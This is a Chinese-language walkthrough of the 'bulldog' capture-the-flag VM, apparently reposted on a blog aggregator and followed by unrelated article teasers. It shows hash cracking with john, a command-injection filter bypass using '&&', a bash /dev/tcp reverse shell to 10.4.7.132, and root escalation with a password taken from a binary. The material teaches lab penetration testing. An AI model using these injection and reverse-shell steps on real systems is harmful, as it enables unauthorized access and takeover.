当前位置：首页 > news >正文

bulldog 靶机

news 2025/12/15 15:29:19

bulldog

信息搜集

存活检测

详细扫描

后台网页扫描

网页信息搜集

正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦·布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一批人。我要试着给你上一堂牛头犬工业网站的速成课。之前的网站是怎么被攻击的?APT利用了网络服务器上的一个漏洞获得了一个低权限shell。从那里，他们利用脏牛在盒子上生根。在那之后，整个系统被接管，他们破坏了网站。我们仍在从旧系统向新系统过渡。同时，我们正在使用一些文件，这些文件可能是从原始系统中损坏的。我们还没来得及确认有没有被黑的痕迹所以如果你发现了，给我发邮件。我们如何防止未来的违规行为?应Churchy先生的要求，我们将从新服务器上完全移除PHP。此外，我们不会使用PHPMyAdmin或任何其他流行的CMS系统。我们的任务是创造我们自己的。新系统的设计?新网站将完全用Django编写(Mr. Churchy要求“高端技术时髦的东西”)。到目前为止，系统上已经启用了SSH。当我们将转换到使用Web-Shell(一个专有的shell接口)时，这个功能将很快关闭。下面的链接解释了这个工具。另外，请注意，我们将开始使用MongoDB，但是我们还没有完全安装它。还要注意的是，我们将实施一个革命性的AV系统，这是由供应商为我们定制的。它宣称能够每分钟运行一次，以检测入侵和黑客行为。一旦它启动并运行，我们将把它安装到系统上。Web-Shell我该找谁开始呢?组长:alan@bulldogindustries.com备用组长:william@bulldogindustries.com前端:malik@bulldogindustries.com前端:kevin@bulldogindustries.com后端:ashley@bulldogindustries.com后端:nick@bulldogindustries.com数据库:sarah@bulldogindustries.com

在此界面的源码中发现了疑似加密的信息，依次解密查看

Team Lead: alan@bulldogindustries.com<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->Back-up Team Lead: william@bulldogindustries.com<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->Front End: malik@bulldogindustries.com<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->Front End: kevin@bulldogindustries.com<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->Back End: ashley@bulldogindustries.com<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->Back End: nick@bulldogindustries.com<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->Database: sarah@bulldogindustries.com<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->.0

管理员登陆

解析密码加密方式
```
hash-identifier
```
sha-1 解密

将密文存储到文件中

john 解密
```
john --format=raw-sha1 pas
```
破解出密文 bulldog
尝试当作密码登录管理员界面

显示登陆成功，但没权限
但此时 /dev/shell 界面可执行指令

反弹 shell

执行允许的命令外的命令会被过滤

尝试绕过

/usr/bin/ping 127.0.0.1 -c 2

失败

pwd&&ping 127.0.0.1 -c 2

可以使用 && 对过滤进行绕过

kali 开启监听

命令框输入链接反弹 shell 命令

pwd&&bash -c "bash -i >& /dev/tcp/10.4.7.132/7777 0>&1"

成功连接

提权

查找敏感文件

查看二进制文件中可打印的字符

strings customPermissionApp

密码

SUPERultimatePASSWORDyouCANTget

切换用户，提示必须在终端执行

创建一个新的终端

python -c 'import pty;pty.spawn("/bin/sh")'

切换 root
```
sudo su root
```
输入密码，提权成功

bulldog 靶机

bulldog 信息搜集存活检测详细扫描后台网页扫描网页信息搜集正在开发的如果你正在读这篇文章，你很可能是Bulldog Industries的承包商。恭喜你!我是你们的新老板，组长艾伦布鲁克。CEO解雇了整个开发团队和员工。因此，我们需要迅速招到一…...

编程日记 2023/10/20 1:52:23

如何借助边缘智能网关打造智慧城市便民驿站

智慧城市驿站是一类提供多样化便利服务的新型智能公共设施，通过融合物联网技术、边缘智能技术、新能源技术等，为城市居民整合提供休闲、购物、卫生、广告、安全等公共服务，进一步提升日常生活体验。本篇就为大家介绍如何基于边缘智能网关&…...

编程日记 2023/10/20 1:51:22

谈谈电商App的压测

背景最近恰逢双十一，大大小小的电商app在双十一之前都会做一次压测，曾经在小公司工作的时候很想知道大公司是如何压测的，有什么高深的压测工具没，本文就来揭露一下压测真相在确认使用什么压测工具进行压测之前，我…...

编程日记 2023/10/20 1:49:21

VsCode修改侧边栏字体大小——用缩放的方法

缩放界面字体百分比（包括编辑器界面） 如果只修改文本编辑区的字体大小，可以在File -> Preferences -> Settings 中修改font的大小。但是侧边栏的字体不会改变，所以可以使用缩放的方法先修改整个界面的字体大小，…...

编程日记 2023/10/20 1:48:19

基于Java的农资采购销售管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序（小蔡coding） 代码参考数据库参考源码获取前言 💗博主介绍：✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…...

编程日记 2023/10/20 1:47:18

【AIGC核心技术剖析】扩大富有表现力的人体姿势和形状估计SMPLer-X模型

富有表现力的人体姿势和形状估计 (EHPS) 将身体、手和面部运动捕捉与众多应用结合起来。尽管取得了令人鼓舞的进展，但当前最先进的方法仍然在很大程度上依赖于有限的训练数据集。在这项工作中，我们研究了将 EHPS 扩展到第一个通用基础模型（称为 SMPLer-X），以 ViT-Huge 作为…...

编程日记 2023/10/20 1:46:17

【C++面向对象】1. 类、对象

文章目录【 1. 类 & 对象的定义】1.1 类的定义1.2 对象的定义【 2. 类的成员】2.1 数据成员2.2 成员函数类的内部定义成员函数类的外部定义成员函数成员函数的访问实例【 3. 类的访问修饰符】3.1 public 公有成员3.2 private 私有成员3.3 protected 保护成员3.4 继承…...

编程日记 2023/10/20 1:45:16

PAM从入门到精通（十三）

接前一篇文章：PAM从入门到精通（十二） 本文参考： 《The Linux-PAM Application Developers Guide》先再来重温一下PAM系统架构： 更加形象的形式： 五、主要函数详解 11. pam_open_session 概述&…...

编程日记 2023/10/20 1:44:15

Stable Diffusion WebUI几种解决手崩溃的方法

1. 添加与手相关负面提示词如何提价提示词呢？首先有一个embeddings模型文件bad-hands-5，我们可以去各个大模型网站去搜，我是在C站上面下载的。附上C站地址：https://civitai.com/ 下载好之后，你需要将文件放入stable-diffusion-webui\embeddings目录中。位置如下所示…...

编程日记 2023/10/20 1:42:12

kr 第三阶段（一）16 位汇编

为什么要学习 16 位汇编？ 16 位汇编包含了大部分 32 位汇编的知识点。有助于在学习内核的两种模式。实模式：访问真实的物理内存保护模式：访问虚拟内存有助于提升调试能力，调试命令与 OllyDbg 和 WinDebug 通用。可以学习实现反…...

编程日记 2023/10/20 1:41:10

power point导出pdf保留字体

在 slides 中用到非自带的字体，如 [1]，想导出成 pdf 文件（因为导出成图，如 png，放大会蒙），并在别人电脑里也保留字体。除了让别人也装上相应字体，可以： 参考 [2]&#x…...

编程日记 2023/10/20 1:40:09

云务器迁移（腾讯云＞华为云）

自己平时除了写些bug外还喜欢玩玩服务器，这不前几年买了一个域名，当时服务器买的是阿里云的，想着域名备案挺麻烦的就一直用着，只是在服务器到期后会重新购买其他运营商的（关键是续不起🤫） 这不最…...

编程日记 2023/10/20 1:39:08

[USACO11MAR] Brownie Slicing G题解(二分+二维前缀和+矩阵分割）

[USACO11MAR] Brownie Slicing G 题目地址 P3017 [USACO11MAR] Brownie Slicing G 思路二分最大化最小值切割思路： 一行一行进行切割，如果这一行可以切割出b块大于等于mid的块，就开始切割下一行如果无法切割出b块，就把正在…...

编程日记 2023/10/20 1:38:07

【每日一题】—— B. Arrays Sum （Grakn Forces 2020）

🌏博客主页：PH_modest的博客主页 🚩当前专栏：每日一题 💌其他专栏： 🔴 每日反刍 🟡 C跬步积累 🟢 C语言跬步积累 🌈座右铭：广积粮，缓称…...

编程日记 2023/10/20 1:37:06

XTU-OJ 1328-数码和

题目描述一个10进制数n在2∼16进制下可以得到的不同的数码和，求在这些数码和中出现次数最多的数码和。比如20， 进制2345678910111213141516数码10100202110403226242220191817161514数码和2424586421098765 其中数码和2和4分别出现了3次，为…...

编程日记 2023/10/20 1:36:05

混入组件 (mixin)

1 什么是混入以及作用 *混入 (mixin) 提供了一种非常灵活的方式，来分发 Vue 组件中的可复用功能。一个混入对象可以包含任意组件选项。当组件使用混入对象时，所有混入对象的选项将被“混合”进入该组件本身的选项。作用：主要作用是继承和封装…...

编程日记 2023/10/20 1:35:04

ubuntu18.04 RTX3060 rangnet++训练

代码链接： https://github.com/PRBonn/lidar-bonnetal 安装anaconda环境为 CUDA 11.0（11.1也可以） anaconda环境如下 numpy1.17.2 torchvision0.2.2 matplotlib2.2.3 tensorflow1.13.1 scipy0.19.1 pytorch1.7.1 vispy0.5.3 opencv_python…...

编程日记 2023/10/20 1:34:03

HZOJ-72：猜拳

题目描述在一次聚会中，每人拿着一张印有石头、剪刀、布的卡片，每个人具体拿得是哪种卡片不得而知。现在告诉你某些人之间的胜负关系，并会询问某两个人之间的对战结果，人按照从 11 到 n� 编号。对于每个…...

编程日记 2023/10/20 1:33:02

【Django 03】QuerySet 和 Instance应用

1. DRF QuerySet 和 Instance功能概述 1.1 QuerySet 从数据库中查询结果存放的集合称为 QuerySet。 Django ORM用到三个类：Manager、QuerySet、Model。每个Model都有一个默认的 manager实例，名为objects。Django的ORM通过Mode的objects属性提供各种数据…...

编程日记 2023/10/20 1:32:02

安装 mysql

gpt: 要在 Debian 11 上安装 MySQL 数据库服务器，您可以使用以下步骤： 1. **更新软件包列表**：在安装任何软件之前，始终建议首先更新软件包列表，以确保获取最新的软件包信息。在终端中运行以下命令： bash…...

编程日记 2023/10/20 1:31:01

IDEA运行Tomcat出现乱码问题解决汇总

最近正值期末周，有很多同学在写期末Java web作业时，运行tomcat出现乱码问题，经过多次解决与研究，我做了如下整理： 原因： IDEA本身编码与tomcat的编码与Windows编码不同导致，Windows 系统控制台…...

编程新知 2025/12/14 9:57:44

MFC内存泄露

1、泄露代码示例 void X::SetApplicationBtn() {CMFCRibbonApplicationButton* pBtn GetApplicationButton();// 获取 Ribbon Bar 指针// 创建自定义按钮CCustomRibbonAppButton* pCustomButton new CCustomRibbonAppButton();pCustomButton->SetImage(IDB_BITMAP_Jdp26)…...

编程新知 2025/12/15 9:14:10

oracle与MySQL数据库之间数据同步的技术要点

Oracle与MySQL数据库之间的数据同步是一个涉及多个技术要点的复杂任务。由于Oracle和MySQL的架构差异，它们的数据同步要求既要保持数据的准确性和一致性，又要处理好性能问题。以下是一些主要的技术要点： 数据结构差异数据类型差异&#xff…...

编程新知 2025/8/12 3:03:43

高危文件识别的常用算法：原理、应用与企业场景

高危文件识别的常用算法：原理、应用与企业场景高危文件识别旨在检测可能导致安全威胁的文件，如包含恶意代码、敏感数据或欺诈内容的文档，在企业协同办公环境中（如Teams、Google Workspace）尤为重要。结合大模型技术&…...

编程新知 2025/12/8 18:11:55

反射获取方法和属性

Java反射获取方法在Java中，反射（Reflection）是一种强大的机制，允许程序在运行时访问和操作类的内部属性和方法。通过反射，可以动态地创建对象、调用方法、改变属性值，这在很多Java框架中如Spring和Hiberna…...

编程新知 2025/11/9 2:57:17

Python基于历史模拟方法实现投资组合风险管理的VaR与ES模型项目实战

说明：这是一个机器学习实战项目（附带数据代码文档），如需数据代码文档可以直接到文章最后关注获取。 1.项目背景在金融市场日益复杂和波动加剧的背景下，风险管理成为金融机构和个人投资者关注的核心议题之一。VaR&…...

编程新知 2025/12/8 22:05:50

基于IDIG-GAN的小样本电机轴承故障诊断

目录 🔍 核心问题一、IDIG-GAN模型原理 1. 整体架构 2. 核心创新点 (1) 梯度归一化（Gradient Normalization） (2) 判别器梯度间隙正则化（Discriminator Gradient Gap Regularization） (3) 自注意力机制（Self-Attention） 3. 完整损失函数二…...

编程新知 2025/12/12 10:03:57

C++课设：简易日历程序（支持传统节假日 + 二十四节气 + 个人纪念日管理）

名人说：路漫漫其修远兮，吾将上下而求索。—— 屈原《离骚》创作者：Code_流苏(CSDN)（一个喜欢古诗词和编程的Coder😊）专栏介绍：《编程项目实战》目录一、为什么要开发一个日历程序？1. 深入理解时间算法2. 练习面向对象设计3. 学习数据结构应用二、核心算法深度解析…...

编程新知 2025/7/20 6:08:51

探索Selenium：自动化测试的神奇钥匙

目录一、Selenium 是什么1.1 定义与概念1.2 发展历程1.3 功能概述二、Selenium 工作原理剖析2.1 架构组成2.2 工作流程2.3 通信机制三、Selenium 的优势3.1 跨浏览器与平台支持3.2 丰富的语言支持3.3 强大的社区支持四、Selenium 的应用场景4.1 Web 应用自动化测试4.2 数据…...

编程新知 2025/11/19 18:06:51

OD 算法题 B卷【正整数到Excel编号之间的转换】

文章目录正整数到Excel编号之间的转换正整数到Excel编号之间的转换 excel的列编号是这样的：a b c … z aa ab ac… az ba bb bc…yz za zb zc …zz aaa aab aac…; 分别代表以下的编号1 2 3 … 26 27 28 29… 52 53 54 55… 676 677 678 679 … 702 703 704 705;…...

编程新知 2025/8/31 2:33:30